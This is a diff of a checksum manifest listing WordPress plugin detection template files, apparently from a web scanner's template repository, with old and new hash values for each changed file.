+http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d +http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b +http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b +http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:7e97c3677725419acd5f2ba21490b571a984ff7b -http/technologies/wordpress/plugins/header-footer-elementor.yaml:bcb1653e856e0008d153f12ccb5be35ba1e46cdb -http/technologies/wordpress/plugins/header-footer.yaml:312a9c848d65bb913369c4e6ae76b3755513a71f -http/technologies/wordpress/plugins/health-check.yaml:034a1b426afdf3717e444996eb52297bdd0ee0c2 -http/technologies/wordpress/plugins/hello-dolly.yaml:8568be3d2832b6247d1c9cda80f5fc62a676cead -http/technologies/wordpress/plugins/host-webfonts-local.yaml:754da1c47401f04dada1b78261832dcb31ee9853 -http/technologies/wordpress/plugins/hostinger.yaml:76df4c56454fb4232e7b736af2f9981068d5164e +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 +http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 +http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb +http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c +http/technologies/wordpress/plugins/hostinger.yaml:5528d42fea5183ffda7073d1c116da79afb63cf3 http/technologies/wordpress/plugins/image-optimization.yaml:fd00671fcb1a927454714d707e89e62b40f6a329 -http/technologies/wordpress/plugins/imagify.yaml:438875f7effa4423044bc24d5e06fb21ff51aab6 -http/technologies/wordpress/plugins/imsanity.yaml:846eef1e1f1dc42e70d8abe1b63921e0c6543253 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:4b873f476425017c1dbf05ac33ad171a8f903ecf -http/technologies/wordpress/plugins/instagram-feed.yaml:1e0845363380d7441a54743d7fc64f0a064939a7 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:900c94abb4d18248826f1805a3216c0a06cd9d59 -http/technologies/wordpress/plugins/iwp-client.yaml:33cb28de0ae59fe6eeb13e0e1994fecbad8abef4 -http/technologies/wordpress/plugins/jetpack-boost.yaml:ef32ea1942cf0f67f90a8d289414e11f294bd6bb -http/technologies/wordpress/plugins/jetpack.yaml:5a93dd77f6a73191b4bdb1aef867cf22a5a61898 -http/technologies/wordpress/plugins/kadence-blocks.yaml:f12cdccdf84e5fbca99142b81c2ba192fe280d6d -http/technologies/wordpress/plugins/kirki.yaml:62a9ede76f4bc32508ab3e12e345de28b7a10df6 -http/technologies/wordpress/plugins/leadin.yaml:3aad041be3333930bb4071ee63f8620ec5e2ba99 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:f84fa8ef10ddb7da1a3c3bf82422b73ed12bd1c7 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:cd99fdefde9e4984115a9189abb53478ee276dcc -http/technologies/wordpress/plugins/litespeed-cache.yaml:e36a45d1e502b6cad2ec4ad9536c1e4bf5c9494e -http/technologies/wordpress/plugins/loco-translate.yaml:554679038778daf4ecf87d6e54e44a22a4dc2492 -http/technologies/wordpress/plugins/loginizer.yaml:c54370f05be0aa5ba5a8c076f1555ad185135891 +http/technologies/wordpress/plugins/imagify.yaml:b82e202b7774603cc5dfc671f09e78399cd6a82b +http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 +http/technologies/wordpress/plugins/instagram-feed.yaml:e2398e4c0e2ea31019da3715d6aed35ccc0f6729 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b +http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 +http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65 +http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e +http/technologies/wordpress/plugins/kadence-blocks.yaml:be5174a80ec6c119a05428acdc1218fac85a6795 +http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 +http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 +http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 +http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 +http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:a895c306438d0b17381106ebe34b893c416c1487 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:cf97c59d6ca9bacd7326ff5758b4704037548e3d -http/technologies/wordpress/plugins/mailpoet.yaml:5d37d6ac3ee7abd298a234cd68a2e8a100c3dcf5 -http/technologies/wordpress/plugins/maintenance.yaml:4908d15a87dc42e3d707ca8b14c695acdc05451a -http/technologies/wordpress/plugins/mainwp-child.yaml:b6d3dee0b969ebb23151a15ae2396120e5749749 -http/technologies/wordpress/plugins/malcare-security.yaml:f1100e3114e1a1a700e56cf9605cf630a175a759 -http/technologies/wordpress/plugins/megamenu.yaml:87c58e3f38cb0dcc6d82fb27a78a14d2aed8de07 -http/technologies/wordpress/plugins/members.yaml:f72b70c40d8c328c3f8aeeb8680b33e7e7d6b6ae -http/technologies/wordpress/plugins/meta-box.yaml:3220c38d8bb113ff30710ef2e79177891642f3eb -http/technologies/wordpress/plugins/metform.yaml:86ffbe9900ed81585695ba690bcf24136bf24157 -http/technologies/wordpress/plugins/ml-slider.yaml:b2a7d6061500a9aede76471aae83dd4b2c8cda9f -http/technologies/wordpress/plugins/newsletter.yaml:0f96bbbb4a82b82e2b63e0f577dcd38f3bc51f53 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:4571816110bf851c4b4487088da4e310d3ed05c2 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:2c51edfc319a4008332d1b0d959370c0fbadcab2 -http/technologies/wordpress/plugins/ninja-forms.yaml:6d2235089dc95816aeec833b45d55f929064f205 -http/technologies/wordpress/plugins/ocean-extra.yaml:c3256dec71a6d1a560f968596eba99768799500b -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:8f3d4f81048dd61f2ae723f0b59dce4969a36bb5 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:ee3801c6bb4a45e6adb51da33cca03d2f444d1ee -http/technologies/wordpress/plugins/optinmonster.yaml:47fc9af237594404ecc1fda1682b09e9c27a73a1 -http/technologies/wordpress/plugins/otter-blocks.yaml:a01173315d2c9aad06431308a5a886133b6ef716 -http/technologies/wordpress/plugins/password-protected.yaml:1bc99e31bb5d21338e9ee00ca18d3251fcdf6385 -http/technologies/wordpress/plugins/pdf-embedder.yaml:b474a0e0dfe6e253d5edcb69cf9d48345e3b4566 +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea +http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d +http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd +http/technologies/wordpress/plugins/mainwp-child.yaml:80de34e84d55586e5eda37d00d277aad7f4b2451 +http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 +http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 +http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e +http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 +http/technologies/wordpress/plugins/metform.yaml:aaa8b95a995e3345112a288f66e705b150968e7e +http/technologies/wordpress/plugins/ml-slider.yaml:104ad761a31985f8f0947e3e0b9bf872fe1f2c2a +http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c +http/technologies/wordpress/plugins/nextgen-gallery.yaml:f00d03dc0f365956376cec268c45bd669729260e +http/technologies/wordpress/plugins/ninja-forms.yaml:cc29026bcd3c62478d5147fd80a8b3a560bfe728 +http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 +http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 +http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7 +http/technologies/wordpress/plugins/password-protected.yaml:b990fff1f3337e512694df82458fcf4d4f50c85c +http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:e38723f1c4f2157384d64e2b2fac7080e66887cc -http/technologies/wordpress/plugins/pixelyoursite.yaml:8e9a84ae0e4579c0e5c1d74a8e81bd40db6f0422 -http/technologies/wordpress/plugins/polylang.yaml:aee3a58c952f2f9638ff374341fc255819c72d1f +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5 +http/technologies/wordpress/plugins/pixelyoursite.yaml:ba9797f8208c7c3ed5cb45048764d8ecd0a62835 +http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:63ee9d1afc4f684cefe2e93383cc3f13282afd43 -http/technologies/wordpress/plugins/post-smtp.yaml:155c3f2eeb681985e995b996be580d2accdd65fa -http/technologies/wordpress/plugins/post-types-order.yaml:48e99e2a6fd50a8bce03d71f0364d80cfad7c029 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:0b05429ee5a639590d22925ce10e85df80307a51 -http/technologies/wordpress/plugins/pretty-link.yaml:7620d75d156d0da9be7790d4001ce4ea34a210ce -http/technologies/wordpress/plugins/really-simple-captcha.yaml:72a821b2e7f0877db55062bb401d7912688a3162 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:e6427cff38c071c332b846bf01bc50ac0deb07f7 -http/technologies/wordpress/plugins/redirection.yaml:9bb1311228712e0139d6501832e4956eb3894d07 -http/technologies/wordpress/plugins/redux-framework.yaml:fd11db1d52f36ef5b0795d96caa416244626e129 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:5fdc1267f04e406ffcd377a4ee8c01eb9a51cf9a +http/technologies/wordpress/plugins/popup-maker.yaml:0838742608b1265516017095ccd495332e6a5991 +http/technologies/wordpress/plugins/post-smtp.yaml:754dd57d96b6f4456c570c7034a2ddf3056539f4 +http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 +http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:195ac372f24aa1feb8c48fba65a97149f05e137f +http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 +http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 http/technologies/wordpress/plugins/royal-elementor-addons.yaml:9f6476b40090f693001f2da81075d5b3e650c2e3 -http/technologies/wordpress/plugins/safe-svg.yaml:2921928bca091dc23532d34c55d522b480a04f9a -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:68c7ac8eecc2d5d848bdc4cb842508b86d39e480 -http/technologies/wordpress/plugins/sg-cachepress.yaml:0f35a0e9b889a6336d077833b0c9e2ffc673a978 -http/technologies/wordpress/plugins/sg-security.yaml:8711830da83847c1cc1f1c1995173144b8b5d6d0 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:6172f73bf27740719c1ebc72545220b9bb543608 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:1f45f93275673ff1ed0b3a841a0b8a9fa3b3fe5c -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:6fd499a700ec9234afa211206a93a07388ae090a +http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:d3871c6333178618d88df609d41ea9e626c1e312 +http/technologies/wordpress/plugins/sg-cachepress.yaml:557b4e350cd47eafc012c39dad25d48d6b397de0 +http/technologies/wordpress/plugins/sg-security.yaml:4d092558c2718bd98454bbec4adf942903cec393 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 http/technologies/wordpress/plugins/simple-history.yaml:8441cfcd6437b914c70f78136d76cdeb85e261a0 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:8407fe83a2757e6f48db7fa58752bdb239513c80 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:9491cca61448ddc0931b9e492d4d0620a7a21f67 -http/technologies/wordpress/plugins/smart-slider-3.yaml:e154bdfae754b085c715850f6cda0816d696862e -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:c51a0e1bf7cc99dc0a6f8a9357ca4bf9d59113d5 +http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 +http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f3961e9e08694816f33e638acf1af19b4262a840 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:9edb30d645fe661041ea30371023297ba0f84558 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:a1116cd9a2c76a5764e177cfc1d75526568adef6 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:053ebf93fa012031b3e3988c8150de94dd210483 -http/technologies/wordpress/plugins/svg-support.yaml:49e21c813ae607ff35fe707f64ebc67e7f327178 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:3f8e37eed37423d52a86e57a2141df2681ef01b8 -http/technologies/wordpress/plugins/tablepress.yaml:3acebea57f9e6de71f74b6d80c7829aa0fb7d5f6 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:da31b9ab7b949ab1375424a9df2b4ed2b9dfe130 -http/technologies/wordpress/plugins/templately.yaml:d7c59eaf040b0d024cd9b98104137e9cc1478bc9 -http/technologies/wordpress/plugins/the-events-calendar.yaml:88785a89dcd69e5d32782ea55f1b0e0a85ccfb1d +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f +http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 +http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa +http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 +http/technologies/wordpress/plugins/templately.yaml:c38b29f2acd823339a5f6e47b6da7d81815bf75b +http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:23e7d0e19e26520b91c0b1fcf6d1408fbf8bc8b4 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:2728bbf5d127842472490ec500c339189878df6a -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:8d84f9fe69c3ed5ef4d75f9ec2c5a70a6a870505 -http/technologies/wordpress/plugins/under-construction-page.yaml:abee15657603197eac7a606f0885a0a67bd9f5da +http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:5fc184d6e1eb819dc98519af81c48502b499de9a +http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:87b0adff906160c39a062518172eede9c138603d +http/technologies/wordpress/plugins/updraftplus.yaml:0869ebd3a5621b5613665f63be4e3bdb52d4f58e http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:f5210c7f44d307cd61a252c775b7f8d8490656dd +http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:be7c63e6636cac0b46191d20ec25589deab59b62 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:138559a38173ef70fafc355f1eb75c6429a1f273 -http/technologies/wordpress/plugins/webp-express.yaml:6e74e967d05828bb44f95df687b779e87a9409a7 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:2d6837eae58c7f181b465c72b79b97eb70b57e96 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:30f16ad1cb93bb00eaa193373ae297ce86e3a456 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:442776bc7b153409179514064fc0af9cab078b09 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:5c10a7d879a5f1f2f3af5a17bed9ea1a473733f9 +http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 +http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:2f315183fd3a4bf762543878055a1c5412b32640 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:961b2182decfa0e47bddb3a9435229fb28c9c7d3 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:d08acfc75ea94ba54850ef27d2720c9a26bbb7cb -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:dec38ddac20e1a62782a05ffecc1e4b694a7dfc1 -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:79997a96471d9c436e710cec07900dce8b9e427b -http/technologies/wordpress/plugins/woocommerce-services.yaml:17acbbed6b5154f5aae7a28a7c809fb0e48a2730 -http/technologies/wordpress/plugins/woocommerce.yaml:a2a714aed8ec2376bcee7b3ec1678d0f1272a8a2 -http/technologies/wordpress/plugins/wordfence.yaml:ea1b287a6acbce1e98bc2c83c1352fb7d6c37087 -http/technologies/wordpress/plugins/wordpress-importer.yaml:07c57e2081d467a57490ac71e31b4bbb1df80e84 -http/technologies/wordpress/plugins/wordpress-seo.yaml:d44ae5b1ee126097bb37a528436991813e0edb88 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:3e379163d373241c2e7a2ad497824f95689ee220 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee +http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba +http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 +http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 +http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 +http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:a824029d257c756741676abbb44b25edae254afa -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:a2e7bf3fb6ee96f6fae88e9c07edb9e30bb16707 -http/technologies/wordpress/plugins/wp-file-manager.yaml:e8b8e06288b4df1e0d589cfd113f9fc49035fb2a -http/technologies/wordpress/plugins/wp-google-maps.yaml:2e2841931788dd3029978fcd2424ba94a1351c88 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:a70b499897756947a0c5604830af10ebaa819992 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:8644a6d73664593769ce715cf0415854a036d17e -http/technologies/wordpress/plugins/wp-migrate-db.yaml:911f2bf405cb47571cbcd16f53c1d3415827b5b9 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:94c4c0f5fe57f20866696c85b5a15df8da9b8814 -http/technologies/wordpress/plugins/wp-optimize.yaml:b9eaa748b3d3c4dd229490eab2204142fa840f7d -http/technologies/wordpress/plugins/wp-pagenavi.yaml:5de3aeb44a09bf52ef4701073df2c7dfabeedc94 -http/technologies/wordpress/plugins/wp-reset.yaml:9df2cc6249ec11b8bdf9db6fab331618da3c8f48 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:cde42b5a67df5b6c2ac62abd20fa2067cef47eb6 -http/technologies/wordpress/plugins/wp-rollback.yaml:63211315dbbb5562c64d1ddbaaaa919f8092d271 -http/technologies/wordpress/plugins/wp-seopress.yaml:21a0dcd8bc914a5f34e7027d82b3c2a973ae8d55 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:4f055866f6f13fa4dc6a5bef06785ed7468f7d25 -http/technologies/wordpress/plugins/wp-smushit.yaml:c084c57d67714820b29c08c483930d7e576bb343 -http/technologies/wordpress/plugins/wp-statistics.yaml:2083a35b9fa31564ccfd5e5c9c20e136953bd09b -http/technologies/wordpress/plugins/wp-super-cache.yaml:3c28754cd4b570550b9fcc64ff21625833f50e3f +http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 +http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a +http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 +http/technologies/wordpress/plugins/wp-optimize.yaml:5e49fe0cc33e1186de691ecb2a3200205d01a211 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 +http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1 +http/technologies/wordpress/plugins/wp-rollback.yaml:145d49708d027968e845531a36739f52eeb1ff3d +http/technologies/wordpress/plugins/wp-seopress.yaml:b7fcb27f3c6d85f16295a55a48ecd693b65a51ca +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 +http/technologies/wordpress/plugins/wp-smushit.yaml:977dd38e8ed67dad650e1bb90aae4b7074ff3ce5 +http/technologies/wordpress/plugins/wp-statistics.yaml:d274d87bcb46e8464ef502d06f790cdb0bf920bd +http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:704d8625d0ce79d506fb219fe7c1dc2ddd020019 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:54ea6e84c5609eb53489da72896741391ec2bee5 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cdc05075471b390a7bc700e286e6087e6dd1d0a1 -http/technologies/wordpress/plugins/wps-hide-login.yaml:43c1d5946823013026eb69a797d8065f3c0b56fd -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:b5b2885059669daf8c747ced108090055364121e +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 +http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 +http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 